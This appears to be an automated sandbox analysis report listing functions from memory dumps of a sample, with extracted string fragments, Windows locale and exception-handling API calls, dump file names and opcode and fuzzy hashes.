GetACP.KERNEL32(?,?,6E9E622F,?,00000000), ref: 6E9E5FE7

Strings

ACP, xrefs: 6E9E5F2E
OCP, xrefs: 6E9E5F64

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7e8347f18555fe58a58e7a8991b5186e505becd9370aaffff955b3577e1afa6e
Instruction ID: a208ff7c7c7cdd20b3c58d348a7b2f1182eb436261fd2126318aea5af8ace3d8
Opcode Fuzzy Hash: 7e8347f18555fe58a58e7a8991b5186e505becd9370aaffff955b3577e1afa6e
Instruction Fuzzy Hash: AE21C722614605ABD75A8FD5C904F8773BEAF45B60B528C64EB09CB908F732DD80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01050ADE, Relevance: 8.1, Strings: 6, Instructions: 592COMMON

Download Yara Rule

Strings

sWP, xrefs: 01050F86
Nw, xrefs: 01051284
s=E, xrefs: 01050E55
<;, xrefs: 01051219
n, xrefs: 01051049
H, xrefs: 0105126B

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: <;$Nw$s=E$sWP$H$n
API String ID: 0-3418553609
Opcode ID: 20867392e0e03aa06d4d0286aafe471f3d387dc2865ea4860a6c5cf22979b414
Instruction ID: 31b18133adbb5cf2893bc2e4f72f84708ba60e316ff65a968c4d6bab8518960d
Opcode Fuzzy Hash: 20867392e0e03aa06d4d0286aafe471f3d387dc2865ea4860a6c5cf22979b414
Instruction Fuzzy Hash: BA6211B15083818FE3B4CF29C589B8BBBE1BBC5354F10891DE6DA96260D7B18849CF53

Uniqueness

Uniqueness Score: -1.00%

Function 010590BA, Relevance: 7.9, Strings: 6, Instructions: 381COMMON

Download Yara Rule

Strings

Q( , xrefs: 010593B3
N?3, xrefs: 01059570
9L3, xrefs: 01059461
6m, xrefs: 01059264
d, xrefs: 01059530
d4#, xrefs: 0105954A

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 6m$9L3$N?3$Q( $d$d4#
API String ID: 0-2083278446
Opcode ID: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction ID: 2b9321b6866b4216c3b7bc4d6e93b4c7213ca473c540c78d4cadd8a42734cdcf
Opcode Fuzzy Hash: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction Fuzzy Hash: 7D122272508380DFD3A8CF65C58AA9FBBE1BBC4758F10891DE9D986260D7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01049384, Relevance: 7.8, Strings: 6, Instructions: 332COMMON

Download Yara Rule

Strings

]C, xrefs: 010495BA
9E3, xrefs: 01049566
\K:, xrefs: 0104946D
?{, xrefs: 0104955E
qo9, xrefs: 0104957E
G=, xrefs: 0104986E

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 9E3$?{$G=$\K:$]C$qo9
API String ID: 0-233201734
Opcode ID: afdb57031c943b719aa001b2150572d26ac7852f584e73ad0fc8bfe3a546f542
Instruction ID: 632834fad98970cb1f674b02e6c7b0f6c9da54fd2f7684eed0c14ac95ab46652
Opcode Fuzzy Hash: afdb57031c943b719aa001b2150572d26ac7852f584e73ad0fc8bfe3a546f542
Instruction Fuzzy Hash: ED0222B15083419FD368CF25D58AA4BFBF2BBC4748F108A2DF1DA86260D7B19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0104E21C, Relevance: 7.8, Strings: 6, Instructions: 316COMMON

Download Yara Rule

Strings

GD, xrefs: 0104E311
|t|o, xrefs: 0104E36A
QY, xrefs: 0104E551
}q, xrefs: 0104E5B0
vi, xrefs: 0104E342
?Hn, xrefs: 0104E41A

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ?Hn$GD$QY$vi$|t|o$}q
API String ID: 0-2058854943
Opcode ID: efe512d5a082baa928f9001d0169ca017cc6965180486205ab7ab3ba19fc5ca4
Instruction ID: e404b151bdc4de7d0899f39e3bc9a4f6d5c6100982b3000df29c4c4f2acb5967
Opcode Fuzzy Hash: efe512d5a082baa928f9001d0169ca017cc6965180486205ab7ab3ba19fc5ca4
Instruction Fuzzy Hash: 94E132B29083419FD7A8CF25C88994BBBE1BBD4758F00892DF5D596260E7B5D908CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0105DEF4, Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

fR, xrefs: 0105E177
t\E, xrefs: 0105E306
,jF, xrefs: 0105E0DA
t\E, xrefs: 0105E20F
K,, xrefs: 0105E1D8
ep#, xrefs: 0105E001

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ,jF$K,$ep#$t\E$t\E$fR
API String ID: 0-1899525808
Opcode ID: 98c7579753e42155665158793c3575bc9c702ba4b83cbe712fbe74000cb9718e
Instruction ID: 57be51c17cc53544a50e9b2acb68f4924ba35b97068895c23f1b5a4baa10d0b4
Opcode Fuzzy Hash: 98c7579753e42155665158793c3575bc9c702ba4b83cbe712fbe74000cb9718e
Instruction Fuzzy Hash: 62B102715083809FD398CF66D58981BFBE1FBC8758F408A2DF5D696260D3B58A09CF06

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

Part of subcall function 6E9DA294: _free.LIBCMT ref: 6E9DA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E9E61F0
IsValidCodePage.KERNEL32(00000000), ref: 6E9E624B
IsValidLocale.KERNEL32(?,00000001), ref: 6E9E625A
GetLocaleInfoW.KERNEL32(?,00001001,6E9DB71F,00000040,?,6E9DB83F,00000055,00000000,?,?,00000055,00000000), ref: 6E9E62A2
GetLocaleInfoW.KERNEL32(?,00001002,6E9DB79F,00000040), ref: 6E9E62C1

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: 064907c5e66f4fa004fb2430873625188e78905e6a27a2110ed47d3b0404d596
Instruction ID: 65d9dd84899a08ba8c20942d9229a55990ea968e088b5a238f2037e75c8adc20
Opcode Fuzzy Hash: 064907c5e66f4fa004fb2430873625188e78905e6a27a2110ed47d3b0404d596
Instruction Fuzzy Hash: 6B516B71910616EAEB52DBE9CC50AAE73BCAF55704F004869EB24EB682E770D904CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01049E22, Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

~6, xrefs: 01049ECD
$q0M, xrefs: 01049EE5
(, xrefs: 01049F2E
Fhe , xrefs: 01049F02
e_, xrefs: 01049F12
9, xrefs: 01049F4E

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $q0M$Fhe $~6$($9$e_
API String ID: 0-442829948
Opcode ID: 78672943ccac9e37b77dba4218f02bf68dc3247c77cb0e01ed8ba68e7d3e51c9
Instruction ID: e9e26be38bc55fd89f9c50d6d1e52481d96f66be12aa4ebc4b3fba3596915f47
Opcode Fuzzy Hash: 78672943ccac9e37b77dba4218f02bf68dc3247c77cb0e01ed8ba68e7d3e51c9
Instruction Fuzzy Hash: 185153B25083418BC798CF14D48541FBBE4FBD8358F504A2DF5EA66260D3B59A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0104A3DF, Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

:b-, xrefs: 0104A6CA
%VwK, xrefs: 0104A9C2
aj`, xrefs: 0104AAD1
,,d, xrefs: 0104A6AD
aj`, xrefs: 0104A961

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: %VwK$,,d$:b-$aj`$aj`
API String ID: 0-266388962
Opcode ID: b910ae03514a3f0544c0c823d4ce2d9e37a8a090c270e80c94dc3b7d698fa214
Instruction ID: bb6137b4abf9d0b0211d572135058e3c476d23a7730d1ee6cb42d3ecd6740440
Opcode Fuzzy Hash: b910ae03514a3f0544c0c823d4ce2d9e37a8a090c270e80c94dc3b7d698fa214
Instruction Fuzzy Hash: 62022FB15083819FD3A8CF25C589A9BBBE1FBD5758F10891CE6DA86260C7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01061343, Relevance: 6.5, Strings: 5, Instructions: 276COMMON

Download Yara Rule

Strings

$, xrefs: 010613D6
$F, xrefs: 010616C1
$8 i, xrefs: 010615BA
0{, xrefs: 010616A7
Wv, xrefs: 01061865

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $$$8 i$$F$Wv$0{
API String ID: 0-2166306512
Opcode ID: 85ab1be0e683b15be5cb9f8cdf900702ef58e3fc826b73b3c4b1b591ee8e7754
Instruction ID: 254d513f99e841566e1b211a493a149cbf4eaa351756b09b29e94800716c11d2
Opcode Fuzzy Hash: 85ab1be0e683b15be5cb9f8cdf900702ef58e3fc826b73b3c4b1b591ee8e7754
Instruction Fuzzy Hash: 6CD1EF714083809FD769CF65C589A5BBBF1BB84758F108A1DF2EA86260D7B58949CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0105F14D, Relevance: 6.5, Strings: 5, Instructions: 248COMMON

Download Yara Rule

Strings

eI, xrefs: 0105F3C1
sc, xrefs: 0105F2AF
@L, xrefs: 0105F2CC
J`m, xrefs: 0105F21C
4z], xrefs: 0105F34F

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 4z]$J`m$eI$sc$@L
API String ID: 0-10485883
Opcode ID: 7dd47986bd17feb0f08111eca03bc30cb2d803a741c0c39ab7d10f4a32a17223
Instruction ID: 81ad2a31c906658dd4bda771baac1e12c2b4c7370849049a593a82995aa6e999
Opcode Fuzzy Hash: 7dd47986bd17feb0f08111eca03bc30cb2d803a741c0c39ab7d10f4a32a17223
Instruction Fuzzy Hash: 9FC11D710093829FC3A8DF25C58941BBFF1BB85748F508A1EF6E686260C3B9D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 01044F8E, Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

F], xrefs: 01045116
T@, xrefs: 010450DD
7], xrefs: 0104519D
=od, xrefs: 0104514C
p9<, xrefs: 01045017

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 7]$=od$F]$T@$p9<
API String ID: 0-1412243312
Opcode ID: 60060cc49e6fa453fc9247d5000328b1eac688cbf3a336a6d0b1d5c659482288
Instruction ID: 2cb3066efc919273913626a1ffe2bbd7578fca2287a7feec421fe0664bd72df2
Opcode Fuzzy Hash: 60060cc49e6fa453fc9247d5000328b1eac688cbf3a336a6d0b1d5c659482288
Instruction Fuzzy Hash: B1B12FB2508341AFD3A8CF25D98A90FBBF1BBC5748F50891DF5D986260D3B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0104CC8D, Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

oQAa, xrefs: 0104CE6B
LZ\9, xrefs: 0104CED0
V), xrefs: 0104CDA4
*, xrefs: 0104CE1B
<yG0, xrefs: 0104CD59

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: *$<yG0$LZ\9$V)$oQAa
API String ID: 0-2624737150
Opcode ID: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction ID: 5db27796622fc7efd26a38485d4d957689b7b57ac1f4261193d20b90cf7f6468
Opcode Fuzzy Hash: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction Fuzzy Hash: E0A121B11083429BD7A8CE65998996BBBF1FBD4348F00491CF6C682260D7B5CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 01051C10, Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

V;, xrefs: 01051DFB
q"}, xrefs: 01051E42
En, xrefs: 01051DE0
i"y, xrefs: 01051D8C
u}s, xrefs: 01051D74

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: En$i"y$q"}$u}s$V;
API String ID: 0-780694712
Opcode ID: a6d08bd2ac4b991d6cdd72dda0527678847859628d6bb3dae3dc4642ce5e84fc
Instruction ID: e152d80da0002ee9b450cdd3b7bce29cae045dd57668ab4e369fd0fd5b0210d8
Opcode Fuzzy Hash: a6d08bd2ac4b991d6cdd72dda0527678847859628d6bb3dae3dc4642ce5e84fc
Instruction Fuzzy Hash: 4F811E714093429FC398DF65D58A40BFBE1BB98748F405A2DF996A6220C3B5CA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9DB726,?,?,?,?,6E9DB318,?,00000004), ref: 6E9E588E
_wcschr.LIBVCRUNTIME ref: 6E9E591E
_wcschr.LIBVCRUNTIME ref: 6E9E592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E9DB726,00000000,6E9DB846), ref: 6E9E59CF

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 374e28a0db3a478c9ac9571b9bf94ac0a03e6db494267295af824c7ef4f4a9ee
Instruction ID: fb22df6f59d05f64550cd52c1eaa21e085d74d8b8706799ea9241279fb8dd813
Opcode Fuzzy Hash: 374e28a0db3a478c9ac9571b9bf94ac0a03e6db494267295af824c7ef4f4a9ee
Instruction Fuzzy Hash: DE612671600606AAEB169FF5CC41BEA73ACEF45714F14482AEB15DB980EB70E944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C5239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C523E
UnhandledExceptionFilter.KERNEL32(6E9EB3CC,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5247
GetCurrentProcess.KERNEL32(C0000409,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5252
TerminateProcess.KERNEL32(00000000,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5259

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 32741677a257db07706a83ab6b995ead700a79272c9cfb9c29ca1f0f2655259c
Instruction ID: cd818e52e36c00146d141cc7229c24d6f494f6666648844856aa29ff6393f59f
Opcode Fuzzy Hash: 32741677a257db07706a83ab6b995ead700a79272c9cfb9c29ca1f0f2655259c
Instruction Fuzzy Hash: 63D00272048B08EFDE612BE1D95DB993F38EF4A767F004410F70A86469EB7154518B66

Uniqueness

Uniqueness Score: -1.00%

Function 01061A3C, Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

'>, xrefs: 01061B3C
q^>, xrefs: 01061AD0
K_<, xrefs: 010620DA
78, xrefs: 010621C8

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: '>$78$K_<$q^>
API String ID: 0-578490123
Opcode ID: 4b3bb0d298ff96da7be7bff4274a98c2089b9adcae7a3285f1cc609bd55e0c6e
Instruction ID: 2e047c6105be53e45ef204b2aede9281ec5e66323f7ae3ddeb6b7ba49c0a35ab
Opcode Fuzzy Hash: 4b3bb0d298ff96da7be7bff4274a98c2089b9adcae7a3285f1cc609bd55e0c6e
Instruction Fuzzy Hash: F742F371509381DFD3B8CF25C989B8BBBE2BBC5744F10891DE6C996260DBB18949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 01052FA2, Relevance: 5.4, Strings: 4, Instructions: 377COMMON

Download Yara Rule

Strings

X', xrefs: 0105312F
:]@^, xrefs: 010534D8
iz, xrefs: 0105326B
M/, xrefs: 01053376

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: X'$:]@^$M/$iz
API String ID: 0-798460462
Opcode ID: 341d0b17a09003169442cacdfe32c6210e31db52bafb59b84cdd7e6f1c88048b
Instruction ID: 0658159618786cc08e1bd70b48e912e053d9433583a712961d518f54029e6004
Opcode Fuzzy Hash: 341d0b17a09003169442cacdfe32c6210e31db52bafb59b84cdd7e6f1c88048b
Instruction Fuzzy Hash: FD0251B15083809FD3A8CF25D589A5BBBF1FBC4748F10891DE6CA8A260D7B59909CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0105056A, Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

h.X, xrefs: 01050660
o%, xrefs: 010506CA
gE", xrefs: 010506F4
H9I9, xrefs: 01050816

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: H9I9$gE"$h.X$o%
API String ID: 0-2007577475
Opcode ID: b5174fe56b01dcf9753396da0800712dd25c818fa92e02c418385f4b7ea7b61e
Instruction ID: aa5cded4bd406f5a56300c93e9ba9d2457b444ec916d6308dba395412e0f6220
Opcode Fuzzy Hash: b5174fe56b01dcf9753396da0800712dd25c818fa92e02c418385f4b7ea7b61e
Instruction Fuzzy Hash: 6FD10D715083808FD3A8CF69C58965FBBF1BB85718F108A1DF6EA86260D3B58949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0105F83F, Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

e. , xrefs: 0105FA1D
8V, xrefs: 0105FA4E
:gy, xrefs: 0105FC54
9a, xrefs: 0105FA7E

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: 8V$9a$:gy$e.
API String ID: 0-1083161237
Opcode ID: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction ID: d2a85c0e8b35198aceaaf58af0f8ef62a3b8f6e080150867aad9724721e18fdb
Opcode Fuzzy Hash: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction Fuzzy Hash: F9B12F715093419FC394CF2AC58884BBBE1FBC8B58F408A1DF69596260C7B9D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0105D091, Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

mZf3, xrefs: 0105D2E9
-, xrefs: 0105D16B
(, xrefs: 0105D20A
}]}, xrefs: 0105D0CF

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ($-$mZf3$}]}
API String ID: 0-2410773837
Opcode ID: ccf372d09bc0778175b6081f50476668050fb595c593df019c774ccafc5d06fe
Instruction ID: 8a42058c09ecb4cc180b8c827882eca8a129f7514eaf010677fa4ef785f0c6ba
Opcode Fuzzy Hash: ccf372d09bc0778175b6081f50476668050fb595c593df019c774ccafc5d06fe
Instruction Fuzzy Hash: FCA14F714083429FD3A8DFA5C58981BBBE1BBC9748F40891EF6D696220D3B5DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01054E8A, Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

Q, xrefs: 01055012
I/P, xrefs: 01055067
"u, xrefs: 01054F32
p(F, xrefs: 01055032

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: "u$I/P$Q$p(F
API String ID: 0-2506779150
Opcode ID: e95333e3aba3c5fa217c8124c825f1ef011fb55342bdb0a8686dc5ee57eeca41
Instruction ID: 38997f2271333c79942269c5b65583ff98190e587a4e3b673ca70578bc0024ec
Opcode Fuzzy Hash: e95333e3aba3c5fa217c8124c825f1ef011fb55342bdb0a8686dc5ee57eeca41
Instruction Fuzzy Hash: C39140725083449BC398CF65898941FBBF1FB84758F109A2DFACA96620D3B58949CF87

Uniqueness

Uniqueness Score: -1.00%

Function 01042654, Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

eQL, xrefs: 010427CF
bZ, xrefs: 010426CA
{t, xrefs: 010428A7
bZ, xrefs: 01042787

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: bZ$bZ$eQL${t
API String ID: 0-1136884693
Opcode ID: 2d85644dec34de5d1bfc86371dbea229b0c923422b2c33d3c32ee82e005fc344
Instruction ID: f6e91ddd5b36631d3858b71601e634fc866fe395f893a5fe4e805e3a7d67d60a
Opcode Fuzzy Hash: 2d85644dec34de5d1bfc86371dbea229b0c923422b2c33d3c32ee82e005fc344
Instruction Fuzzy Hash: E6811EB16083419BC398CF25D98981BBBF4FBD4798F405A1DF6C696260D7B6CA09CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0104A048, Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

JML, xrefs: 0104A1AC
!}, xrefs: 0104A091
-C, xrefs: 0104A0F7
;*B, xrefs: 0104A17B

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: -C$JML$!}$;*B
API String ID: 0-1677314592
Opcode ID: 198ea712632aff82d2ba7eaf000112b28e07321ce321202ec5e263ac8c50f6d7
Instruction ID: dd31e9f69ee4058d4bd92bfce19d00105dba7ab168e6cc5dd8d74f222fc7bb75
Opcode Fuzzy Hash: 198ea712632aff82d2ba7eaf000112b28e07321ce321202ec5e263ac8c50f6d7
Instruction Fuzzy Hash: 096146B1208341EBC398CE6AC98581FBEE5FBD9358F40591DF2D296260D772CA458B93

Uniqueness

Uniqueness Score: -1.00%

Function 01054BAA, Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

], xrefs: 01054CEC
\FJ, xrefs: 01054C7B
B'_, xrefs: 01054BF5
`I, xrefs: 01054C15

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: B'_$\FJ$`I$ ]
API String ID: 0-1497742486
Opcode ID: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction ID: 11a010a21ec7b711a7258d60c1cc2fd6e9484fea109c1f6ff210ad690c8bbf55
Opcode Fuzzy Hash: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction Fuzzy Hash: 055122B1D0120DEBDF48DFA5C84A9EEFBB5FB48304F108159E521BA260E7B51A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5B97, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

Part of subcall function 6E9DA294: _free.LIBCMT ref: 6E9DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E9E5BEB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E9E5C3C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E9E5CFC

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast$_abort_free
String ID:
API String ID: 942303603-0
Opcode ID: 7c9bbe9a0ccb8661cdbd6a314396bd8b5374c46e860f27f80165426e6fda30fe
Instruction ID: 74d9958dff8ff1fe9f3a6151b05181faa4b106edc6ef2d43a563797bcb3fea93
Opcode Fuzzy Hash: 7c9bbe9a0ccb8661cdbd6a314396bd8b5374c46e860f27f80165426e6fda30fe
Instruction Fuzzy Hash: 5461FE719147179FEB5A8FA8CC96BAA77BCEF05304F1084A9EA11C6A84F734D981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CED41, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,000000FF), ref: 6E9CEE39
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000000FF), ref: 6E9CEE43
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,000000FF), ref: 6E9CEE50

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 59e2c6100e51bf1b20c32fb7331a10526052abc30532ecdfd38da7d7d52a5c4c
Instruction ID: f67dece478370e8dbc331359c27799626cf8da6ac9415ffb8d0ccd7bc58b795f
Opcode Fuzzy Hash: 59e2c6100e51bf1b20c32fb7331a10526052abc30532ecdfd38da7d7d52a5c4c
